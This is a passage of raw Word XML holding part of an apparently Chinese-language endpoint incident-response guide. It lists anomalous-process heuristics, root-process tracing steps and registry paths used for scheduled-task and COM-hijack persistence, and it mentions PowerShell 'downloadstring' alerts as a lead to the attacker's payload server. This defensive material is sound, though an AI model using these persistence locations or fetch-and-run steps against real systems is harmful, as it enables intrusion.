      <w:r>
        <w:t>在日志中分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出</w:t>
      </w:r>
      <w:r>
        <w:t>异常需要上机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
      <w:r>
        <w:t>时：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>Autoruns检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>持久化</w:t>
      </w:r>
      <w:r>
        <w:t>项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:t>包括（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划任务</w:t>
      </w:r>
      <w:r>
        <w:t>、启动项、服务）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划任务</w:t>
      </w:r>
      <w:r>
        <w:t>中是否有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行未知的</w:t>
      </w:r>
      <w:r>
        <w:t>文件或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，</w:t>
      </w:r>
      <w:r>
        <w:t>注册表和启动项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:t>目录是否包含未知的启动项文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>是否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载</w:t>
      </w:r>
      <w:r>
        <w:t>未签名的或未知的服务（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r>
        <w:t>宿主为dll文件）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查</w:t>
      </w:r>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:t>进程，是否出现异常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:t>行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
      <w:r>
        <w:t>，此时需要DUMP进程内存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>找到恶意代码模块进行后续分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有</w:t>
      </w:r>
      <w:r>
        <w:t>联网功能的进程出现网络连接（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>note</w:t>
      </w:r>
      <w:r>
        <w:t>pad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>rundll32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>hh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常</w:t>
      </w:r>
      <w:r>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具有窗口</w:t>
      </w:r>
      <w:r>
        <w:t>UI的进程未出现窗口UI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（notepad、</w:t>
      </w:r>
      <w:r>
        <w:t>calc等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应当</w:t>
      </w:r>
      <w:r>
        <w:t>有命令行参数的进程未带参执行（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rundll</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不具备</w:t>
      </w:r>
      <w:r>
        <w:t>命令执行功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:t>创建cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/power</w:t>
      </w:r>
      <w:r>
        <w:t>shell执行命令（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:t>、msql等）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:t>模块签名出现未通过签名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
      <w:r>
        <w:t>的未知进程文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终端</w:t>
      </w:r>
      <w:r>
        <w:t>威胁溯源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>覆盖</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3个</w:t>
      </w:r>
      <w:r>
        <w:t>点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>告警中得到的cc地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>进程本身关联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源</w:t>
      </w:r>
      <w:r>
        <w:t>ip地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否</w:t>
      </w:r>
      <w:r>
        <w:t>匹配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如</w:t>
      </w:r>
      <w:r>
        <w:t>powershell执行告警中的downloadstring中提取的是攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下发</w:t>
      </w:r>
      <w:r>
        <w:t>恶意代码的服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:r>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身</w:t>
      </w:r>
      <w:r>
        <w:t>关联的可能是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一条</w:t>
      </w:r>
      <w:r>
        <w:t>内网ip，此时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:t>从关联的内网ip向上溯源查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>该ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关联</w:t>
      </w:r>
      <w:r>
        <w:t>的其它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动</w:t>
      </w:r>
      <w:r>
        <w:t>，尝试还原内网横向移动的攻击路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:r>
        <w:t>机发现的异常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程且</w:t>
      </w:r>
      <w:r>
        <w:t>未在EDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告警</w:t>
      </w:r>
      <w:r>
        <w:t>中展示的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:t>，拿到进程PID后在EDR日志数据中搜索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>聚合IP访问、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终端</w:t>
      </w:r>
      <w:r>
        <w:t>进程信息、进程注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>详情信息，按照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1中</w:t>
      </w:r>
      <w:r>
        <w:t>步骤继续溯源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>这种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>情况大部分发生在</w:t>
      </w:r>
      <w:r>
        <w:t>进程注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>其它设备的告警</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOC</w:t>
      </w:r>
      <w:r>
        <w:t>如IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>MD5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>，拿到IOC后直接在EDR日志中查找相关线索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1中</w:t>
      </w:r>
      <w:r>
        <w:t>方式进行逐级溯源</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>根进程溯源过程中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主</w:t>
      </w:r>
      <w:r>
        <w:t>要把ip访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>终端进程信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r>
        <w:t>结合和关联</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>典型</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根</w:t>
      </w:r>
      <w:r>
        <w:t>进程溯源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>场景：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>追溯到的根进程是explorer</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe，</w:t>
      </w:r>
      <w:r>
        <w:t>即从资源管理器中启动的进程，一种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是直接</w:t>
      </w:r>
      <w:r>
        <w:t>explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>派生</w:t>
      </w:r>
      <w:r>
        <w:t>的恶意进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双击运行</w:t>
      </w:r>
      <w:r>
        <w:t>或由其它父进程为explorer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动，若</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>explorer</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe本身</w:t>
      </w:r>
      <w:r>
        <w:t>存在异常行为，则可能是发生进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被注入行为，</w:t>
      </w:r>
      <w:r>
        <w:t>可在原始日志中的进程注入进行排查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>追溯到的根进程是</w:t>
      </w:r>
      <w:r>
        <w:t>taskeng.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。可能是一个计划任务启动的，</w:t>
      </w:r>
      <w:r>
        <w:t>查看计划任务注册表及对应的计划任务目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>追溯到的进程是svchost</w:t>
      </w:r>
      <w:r>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般</w:t>
      </w:r>
      <w:r>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两种</w:t>
      </w:r>
      <w:r>
        <w:t>情况，一种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其</w:t>
      </w:r>
      <w:r>
        <w:t>根</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe进程，</w:t>
      </w:r>
      <w:r>
        <w:t>即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能是从一个服务启动的，</w:t>
      </w:r>
      <w:r>
        <w:t>此时可以使用ark工具来确定异常的svchost中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:t>的加载模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>找到未签名或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未</w:t>
      </w:r>
      <w:r>
        <w:t>知的dll模块进行筛选；第二种则是恶意代码注入到svchost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>按进程注入流程进行检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若追溯</w:t>
      </w:r>
      <w:r>
        <w:t>到的进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>树</w:t>
      </w:r>
      <w:r>
        <w:t>中存在wmiprv进程，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则</w:t>
      </w:r>
      <w:r>
        <w:t>需要排查wmi命令空间，按wmi后门排查流程处理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>追溯的进程来源未知或是</w:t>
      </w:r>
      <w:r>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再</w:t>
      </w:r>
      <w:r>
        <w:t>按以上步骤排查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r>
        <w:t>无异常，可考虑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否</w:t>
      </w:r>
      <w:r>
        <w:t>被修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先</w:t>
      </w:r>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下</w:t>
      </w:r>
      <w:r>
        <w:t>位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>之后使用终端调查详细信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面</w:t>
      </w:r>
      <w:r>
        <w:t>的子注册表项，查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划任务</w:t>
      </w:r>
      <w:r>
        <w:t>是否直接在trigger中执行代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>HKCU\Software\Classes\CLSID\[hijacked CLSID]\InProcServer32</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="720" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>HKCU\Software\Classes\Wow6432Node\CLSID\[hijacked CLSID]\InProcServer32</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="720" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查是否</w:t>
      </w:r>
      <w:r>
        <w:t>存在异常的COM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
